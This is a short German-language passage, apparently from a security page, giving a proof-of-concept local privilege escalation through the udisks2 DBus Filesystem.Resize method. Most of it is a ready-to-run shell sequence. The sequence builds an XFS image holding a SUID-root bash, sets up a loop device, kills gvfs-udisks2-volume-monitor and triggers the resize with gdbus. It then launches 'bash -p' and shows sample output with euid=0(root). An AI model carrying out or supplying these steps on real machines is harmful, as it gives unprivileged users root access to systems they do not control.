
Exploit
udisks2-Versionenudisks2-Dienst (DBus-Schnittstelle)org.freedesktop.UDisks2.Filesystem.Resize-Methode/tmp/blockdev*dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount
chmod 04555 ./xfs.mount/bash # SUID-Bit setzen
umount ./xfs.mount
# Systemfähigkeiten prüfen
gdbus call --system --dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
# Störende Prozesse beenden
killall -KILL gvfs-udisks2-volume-monitor
# Loop-Gerät einrichten
udisksctl loop-setup --file ./xfs.image --no-user-interaction
# Hintergrundüberwachung (wird ausgeführt, wenn SUID-Binärdatei erscheint)
while true; do
/tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break
done 2>/dev/null &
# Schwachstelle über DBus auslösen
gdbus call --system --dest org.freedesktop.UDisks2 \
--object-path /org/freedesktop/UDisks2/block_devices/loop0 \
--method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
/tmp/blockdev*/bash -p # Privilegierte Shell starten
id
# uid=65534(nobody) gid=65534(nobody) euid=0(root)
Exploit funktioniert nur in logind-Sitzungen!
udisksctl loop-setup --no-user-interaction-Aufruf von polkit verweigert,
sodass der PoC mit „Failed to create loop device“ abbricht.Hinweis:
$ sudo bash exploit.sh create
$ bash exploit.sh exploit
